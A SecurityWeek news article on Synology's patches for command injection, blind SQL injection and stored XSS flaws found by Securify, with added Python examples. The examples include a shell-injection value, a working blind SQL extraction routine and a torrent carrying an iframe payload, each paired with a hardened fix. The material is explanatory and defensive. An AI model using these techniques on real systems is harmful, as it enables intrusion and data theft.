Synology Patches Serious Flaws in NAS Software

Network attached storage (NAS) company Synology has released updates for its Video Station and Download Station applications to patch several vulnerabilities identified by Dutch security company Securify.

Researchers uncovered a total of three vulnerabilities in Synology Video Station, a piece of software that allows users of Synology DiskStation NAS devices to easily organize and watch their videos.

One of the flaws is a command injection affecting the subtitle.cgi CGI script. The vulnerability can be exploited to execute arbitrary commands with root privileges, and compromise DiskStation NAS devices and all the data stored on them. If the “public share” feature is enabled (enabled by default), the vulnerability can be exploited remotely by an unauthenticated attacker.

Han Sahin, co-founder of Securify, told SecurityWeek that this high-risk vulnerability can be exploited even if the public share feature is disabled, by brute-forcing the parameters of the share URL. This is possible because the vulnerable subtitle.cgi request does not include cryptographically strong random numbers. The expert pointed out that the vulnerability is easiest to exploit in scenarios where users explicitly share a video with other users.
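The two weaknesses described above, as an added illustration (this is not Synology's code and not Securify's proof of concept): a handler that splices a request parameter into a shell command line is command-injectable, while an argv list with no shell plus path validation is not; and a share link whose only secret is a short token is brute-forceable, while a token drawn from the OS CSPRNG with 256 bits of entropy is not. The media root, the iconv command and all function names are assumptions for this example.

```python
"""Added example, not from Synology or Securify. Names and paths are hypothetical."""
import hmac
import os
import re
import secrets
import subprocess

SUBTITLE_ROOT = "/volume1/video"  # assumed media root (hypothetical)


def vulnerable_command(subtitle_path: str) -> str:
    # Vulnerable pattern: the request parameter becomes part of a shell string.
    # A value such as "a.srt; id" runs `id` with the CGI process's privileges
    # (root, in the case described in the article).
    return "iconv -f cp1252 -t utf-8 " + subtitle_path


def demo_injection(subtitle_path: str) -> str:
    # Runs the vulnerable string through a real shell and returns stdout.
    # If iconv is missing the first command just fails on stderr; the injected
    # command after ';' still runs, which is the point.
    res = subprocess.run(vulnerable_command(subtitle_path), shell=True,
                         capture_output=True, text=True)
    return res.stdout


def hardened_argv(subtitle_path: str) -> list:
    # Hardened: allow-list the characters, confine the resolved path to the
    # media root, and pass an argv list so no shell ever parses user input.
    if not re.fullmatch(r"[A-Za-z0-9_./ -]+\.srt", subtitle_path):
        raise ValueError("rejected subtitle path")
    full = os.path.realpath(os.path.join(SUBTITLE_ROOT, subtitle_path))
    if not full.startswith(SUBTITLE_ROOT + os.sep):
        raise ValueError("path escapes media root")
    return ["iconv", "-f", "cp1252", "-t", "utf-8", full]


def hardened_rejects(subtitle_path: str) -> bool:
    try:
        hardened_argv(subtitle_path)
        return False
    except ValueError:
        return True


def make_share_token() -> str:
    # 32 bytes (256 bits) from the OS CSPRNG, URL-safe base64: 43 characters.
    return secrets.token_urlsafe(32)


def token_is_valid(presented: str, stored: str) -> bool:
    # Constant-time compare so response timing does not leak the stored token.
    return hmac.compare_digest(presented.encode(), stored.encode())


def expected_brute_force_seconds(bits: int, guesses_per_second: float) -> float:
    # Expected guesses to hit a uniformly random token of `bits` bits is 2^(bits-1).
    return (2 ** (bits - 1)) / guesses_per_second


if __name__ == "__main__":
    print(repr(demo_injection("x.srt; echo INJECTED")))      # 'INJECTED\n'
    print(hardened_argv("movies/a.srt"))
    print(hardened_rejects("x.srt; echo INJECTED"), hardened_rejects("../../etc/passwd.srt"))
    tok = make_share_token()
    print(len(tok), token_is_valid(tok, tok))
    # A 32-bit token at 10k guesses/s falls in ~2.5 days; a 256-bit one never does.
    print(expected_brute_force_seconds(32, 1e4), expected_brute_force_seconds(256, 1e4))
```

The regex alone would still let `../` through, which is why the realpath check is layered on top; the two checks fail different payloads and both are needed.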

Securify has also identified two blind SQL injection vulnerabilities in Video Station. The flaws, found in the watchstatus.cgi and audiotrack.cgi CGI scripts, can be exploited to access the application’s PostgreSQL database server.

Sahin says these SQL injections have been rated “medium” because they can only be exploited by an authenticated attacker.
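An added example (not Synology's code) of the blind SQL injection class described above: a watch-status lookup that splices a request parameter into the query leaks one bit per request through its row count, which is enough to read other tables one character at a time; the same lookup with a typed, parameterized query does not. sqlite3 stands in for PostgreSQL so the block runs offline (PostgreSQL would use `ascii()` where sqlite uses `unicode()`), and the table layout, column names and handler names are constructed for this illustration.

```python
"""Added example, not from Synology or Securify. Schema and handlers are hypothetical."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: two users' watch positions and a users table
    # the attacker is not supposed to be able to read through this endpoint.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE watch_status (user_id INTEGER, video_id INTEGER, position INTEGER)")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, pw_hash TEXT)")
    con.executemany("INSERT INTO watch_status VALUES (?, ?, ?)",
                    [(1, 10, 120), (1, 11, 5), (2, 10, 0)])
    con.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3thash')")
    return con


def watch_status_vulnerable(con, user_id: int, video_id: str) -> int:
    # Vulnerable: video_id is spliced into the SQL text. The caller only ever
    # sees a row count (watched / not watched), hence "blind".
    sql = (f"SELECT COUNT(*) FROM watch_status "
           f"WHERE user_id={user_id} AND video_id={video_id}")
    return con.execute(sql).fetchone()[0]


def watch_status_safe(con, user_id: int, video_id: str) -> int:
    # Hardened: coerce to the expected type, then bind as a parameter.
    vid = int(video_id)  # raises ValueError for "10 AND ..."
    return con.execute(
        "SELECT COUNT(*) FROM watch_status WHERE user_id=? AND video_id=?",
        (user_id, vid)).fetchone()[0]


def safe_rejects(con, user_id: int, video_id: str) -> bool:
    try:
        watch_status_safe(con, user_id, video_id)
        return False
    except ValueError:
        return True


def blind_extract(con, user_id: int, subquery: str, length: int) -> str:
    # Boolean-based blind extraction against the vulnerable handler: for each
    # character position, binary-search the code point in [32, 126] using the
    # 1-row / 0-row difference as the oracle. About 7 requests per character.
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"10 AND unicode(substr(({subquery}),{pos},1))>{mid}"
            if watch_status_vulnerable(con, user_id, payload) == 1:
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(blind_extract(db, 1, "SELECT pw_hash FROM users WHERE name='admin'", 10))  # s3cr3thash
    print(watch_status_safe(db, 1, "10"), safe_rejects(db, 1, "10 AND 1=1"))
```

The oracle here is only "did the row match", which is why the article's "medium" rating still implies full database read access for an authenticated user: the attacker never needs to see query output, only a yes/no.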

The Video Station vulnerabilities were reported to Synology this summer. The vendor patched the audiotrack.cgi issue with the release of version 1.5-0757, but the other two issues were initially missed and were only fixed later, with the release of version 1.5-0763.

Securify also found multiple high severity persistent cross-site scripting (XSS) bugs in Download Station, an application that enables DiskStation devices to serve as a download center. Users can utilize Download Station to download files from BitTorrent, file hosting and other services.

Researchers discovered that the feature designed for creating download tasks by uploading files (e.g. a torrent file) exposes users to XSS attacks. Malicious actors can execute an XSS payload in the context of the application if they can trick victims into loading a specially crafted download file. A proof-of-concept (PoC) video from Securify shows how a malicious torrent file can be used to load an arbitrary website in an iframe.

A similar XSS was found in the feature that allows users to create download tasks by entering a URL or by using the BT Search feature to find torrent files. In vulnerable versions of Download Station, an attacker can deliver an XSS payload via a maliciously crafted URL.

Attackers can exploit these vulnerabilities to steal users’ session tokens, launch phishing attacks, redirect victims to arbitrary sites, and perform actions on their behalf.
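An added example (not Synology's code and not Securify's PoC file) of the torrent-upload XSS class described above. The task name a download manager displays typically comes from the `name` field of the torrent's `info` dictionary, so a torrent whose name is HTML is a stored payload that fires whenever the task list is rendered without escaping. The block includes a minimal bencode encoder/decoder and a constructed torrent so it runs offline; the rendering functions are hypothetical and the attacker host is a placeholder.

```python
"""Added example, not from Synology or Securify. Renderers and the sample torrent are constructed."""
import html


def bdecode(data: bytes):
    # Minimal bencode decoder: integers, byte strings, lists, dictionaries.
    def parse(i: int):
        c = data[i:i + 1]
        if c == b"i":
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c == b"l":
            i += 1
            items = []
            while data[i:i + 1] != b"e":
                v, i = parse(i)
                items.append(v)
            return items, i + 1
        if c == b"d":
            i += 1
            d = {}
            while data[i:i + 1] != b"e":
                k, i = parse(i)
                v, i = parse(i)
                d[k] = v
            return d, i + 1
        if c.isdigit():
            colon = data.index(b":", i)
            n = int(data[i:colon])
            start = colon + 1
            return data[start:start + n], start + n
        raise ValueError("bad bencode at offset %d" % i)
    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing data after bencode value")
    return value


def bencode(obj) -> bytes:
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, bytes):
        return b"%d:%s" % (len(obj), obj)
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    if isinstance(obj, dict):
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in sorted(obj.items())) + b"e"
    raise TypeError("unsupported type for bencode")


# Constructed payload: the torrent's display name is an iframe, as in the PoC
# described above. The host is a placeholder.
MALICIOUS_NAME = '<iframe src="https://attacker.example/"></iframe>'


def build_torrent(name: str) -> bytes:
    # Single-file torrent with a dummy 20-byte piece hash; enough for a parser.
    info = {b"name": name.encode(), b"piece length": 16384,
            b"pieces": b"\x00" * 20, b"length": 1}
    return bencode({b"announce": b"http://tracker.example/announce", b"info": info})


def task_name(torrent: bytes) -> str:
    # What a download manager would show as the task title.
    return bdecode(torrent)[b"info"][b"name"].decode("utf-8", "replace")


def render_task_row_vulnerable(name: str) -> str:
    # Stored XSS: the attacker-controlled name is interpolated as raw HTML.
    return f"<tr><td>{name}</td></tr>"


def render_task_row_safe(name: str) -> str:
    # Fix: escape for the HTML text context (quote=True also covers attributes).
    return f"<tr><td>{html.escape(name, quote=True)}</td></tr>"


if __name__ == "__main__":
    t = build_torrent(MALICIOUS_NAME)
    n = task_name(t)
    print(render_task_row_vulnerable(n))  # iframe is live markup
    print(render_task_row_safe(n))        # &lt;iframe ...&gt; is inert text
```

Output encoding at the point of rendering is the fix that holds for every ingestion path (uploaded file, pasted URL, search result); validating the torrent's name on upload alone would not have covered the URL and BT Search variants the article goes on to describe.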

The file upload vulnerability in Download Station was patched with the release of version 3.5-2962, and the URL issue was addressed several weeks later with the release of version 3.5-2967.

“Synology fixes reported security issues very fast. The attack surface of NAS software is however very big (almost uncontrollable) and that is why instances of similar issues are easily missed. Users should upgrade to the latest version of Download (v 3.5-2967) and Video Station (v 1.5-0763),” Sahin said.

Synology told SecurityWeek that it released the updates within a couple of days after receiving the vulnerability report.

“The issues have been resolved by applying the most recent application updates and operating system updates. For some time our systems have had a setting available to users to protect against cross-site attacks and as of the latest update this setting is now enabled by default. Synology takes security very seriously and we are constantly updating our applications to make sure our users are protected,” Synology said.

This was not the first time Securify discovered vulnerabilities in Synology software. In May, the security firm published advisories for flaws plaguing Synology DiskStation Manager, and Synology PhotoStation.

*Updated with statement from Synology

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
